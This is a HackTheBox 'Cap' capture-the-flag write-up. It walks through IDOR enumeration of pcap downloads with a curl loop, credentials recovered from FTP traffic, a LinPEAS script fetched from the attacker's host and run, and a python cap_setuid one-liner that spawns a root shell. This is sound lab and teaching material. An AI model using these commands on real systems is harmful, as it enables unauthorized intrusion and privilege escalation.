HackTheBox - Cap | Writeup
Post

HackTheBox - Cap | Writeup

cap

Overview

Cap is a low-difficulty box. The exploitation and privilege escalation parts are pretty straightforward. Attention to detail and basic knowledge about Linux file capabilities are all that is required to pwn it.

Notes

  • If you see a numeric identifier in the URL, try to increase/decrease the value and check the response. It often leads to sensitive data exposure or Insecure Direct Object References (IDOR)
  • Find files with capabilities: getcap -r / 2> /dev/null
  • linux capabilities exploitataion
  • linPEAS

Enumeration

Nmap scan

Let’s run Nmap with basic flags:

  • -p- to scan all TCP ports
  • -n to do not ping the host (assume the host is alive)
  • -sV to do a service scan and get some additional information about the service
  • -sC to run default Nmap enumeration scripts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─$ nmap -Pn -n -sV -sC -p- 10.10.10.245

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 08:57 EDT
Nmap scan report for 10.10.10.245
Host is up (0.035s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Sun, 26 Sep 2021 12:58:00 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|_http-server-header: gunicorn

Nmap reveals 3 services: FTP, SSH and a web service based on gunicorn (Python WSGI HTTP Server). The last one is the most interesting.

User

The main dashboard provides functionality to make a network dump and download the result as a pcap file.

dashboard

Let’s check the source code to get the pcap filepath.

1
<button class="btn btn-info" onclick="location.href='/download/3'">Download</button>

It looks like the App generates file identifiers in a very simple way. Let’s try to bruteforce the id number.

1
2
3
mkdir dumps
for i in `seq 0 100`;do curl --fail --output dumps/$i.pcap http://cap.htb/download/$i;done
ls -alS dumps

I used –fail parameter in the curl command to ignore 404 code responses

Bingo! There is a quite interesting network dump with the ID=0 (http://cap.htb/download/0). Let’s open it with Wireshark and check the network communications:

1
wireshark dumps/0.pcap

The password for nathan can be easily found in the FTP stream: wireshark

1
nathan:Buck3tH4TF0RM3!

The credentials can be used for SSH:

user

The User’s part is done, let’s go for a privilege escalation.

Root

Let’s use LinPEAS script to enumerate some most common ways for a privilege escalation

1
2
3
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
python -m http.server

On the client side:

1
2
3
wget http://10.10.14.10:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

There is an interesting entry in the Capabilities section: caps

  • it also could be found by running the command getcap -r / 2> /dev/null

Linux Capabilities are used to allow binaries to perform privileged operations without providing them all root permissions. cap_setuid capability allows changing of the UID (set UID of root in your process). Exploitation is pretty straightforward:

1
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash");'

root

w00t